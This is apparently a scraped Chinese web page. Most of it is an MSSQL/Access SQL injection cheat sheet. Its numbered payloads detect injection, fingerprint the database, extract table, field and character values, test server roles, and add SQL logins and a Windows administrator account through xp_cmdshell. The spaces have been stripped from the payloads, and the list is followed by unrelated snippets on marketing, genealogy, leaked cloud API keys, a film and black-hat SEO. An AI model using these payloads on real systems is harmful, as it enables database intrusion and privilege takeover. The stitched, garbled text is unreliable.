1.判断是否有注入
;and1=1
;and1=2
2.初步判断是否是mssql
;anduser>0
3.注入参数是字符
'and[查询条件]and''='
4.搜索时没过滤参数的
'and[查询条件]and'%25'='
5.判断数据库系统
;and(selectcount(*)fromsysobjects)>0mssql
;and(selectcount(*)frommsysobjects)>0access
6.猜数据库
;and(SelectCount(*)from[数据库名])>0
7.猜字段
;and(SelectCount(字段名)from数据库名)>0
8.猜字段中记录长度
;and(selecttop1len(字段名)from数据库名)>0
9.(1)猜字段的ascii值(access)
;and(selecttop1asc(mid(字段名,1,1))from数据库名)>0
(2)猜字段的ascii值(mssql)
;and(selecttop1unicode(substring(字段名,1,1))from数据库名)>0
10.测试权限结构(mssql)
;and1=(SelectIS_SRVROLEMEMBER('sysadmin'));--
;and1=(SelectIS_SRVROLEMEMBER('serveradmin'));--
;and1=(SelectIS_SRVROLEMEMBER('setupadmin'));--
;and1=(SelectIS_SRVROLEMEMBER('securityadmin'));--
;and1=(SelectIS_SRVROLEMEMBER('diskadmin'));--
;and1=(SelectIS_SRVROLEMEMBER('bulkadmin'));--
;and1=(SelectIS_MEMBER('db_owner'));--
11.添加mssql和系统的帐户
;execmaster.dbo.sp_addloginusername;--
;execmaster.dbo.sp_passwordnull,username,password;--
;execmaster.dbo.sp_addsrvrolemembersysadminusername;--
;execmaster.dbo.xp_cmdshell'netuserusernamepassword/workstations:*/times:all/passwordchg:yes/passwordreq:yes/active:yes/add';--
;execmaster.dbo.xp_cmdshell'netuserusernamepassword/add';--
;execmaster.dbo.xp_cmdshell'netlocalgroupadministratorsusername/add';--
$at_id=(int)base64_decode($_REQUEST['id']);仿制代码是相同的作用。 二、Bypass FuzzLeadbbs: makealltopanc.asp0x01 第...
任何产物及项目都面对着新用户来历的问题,运营在产物的整个生命周期内都要举办拉新的事情,需要在差异阶段拟定出适合的计策引发更多新用户的插手。 用户第一次发生产物或项目界说的新行为都可称为拉新,来看看一些...
“籍贯”在如今的社会中已经没有什么价值了,但在法律意义上仍然是个人资料之一,而且有严格的定义。 籍贯 籍贯是指祖居地(祖籍地)或原来籍贯。参照公安部公通字...
简介在日常渗透过程中我们经常遇到信息泄露出ALIYUN_ACCESSKEYID与ALIYUN_ACCESSKEYSECRET(阿里云API key),特别是laravel框架得debug信息。APP中...
2月22日,据报道,贾玲执导的电影《你好李焕英》票房突破40亿,已反超《唐探3》。贾玲路演遭粉丝催婚,一位成都妈妈表示:“我来八卦一下,你看我们差不多大,我都有两个孩子了,...
咨询一个seo手艺,算不算黑帽seo。就是我在内容页头部加入js代码直接跳转到首页。现实用户是打不 这算作弊,而且还不是黑帽seo,黑帽seo是快速抄获得排名的手艺,然则网站被责罚也是早晚的事情。 内...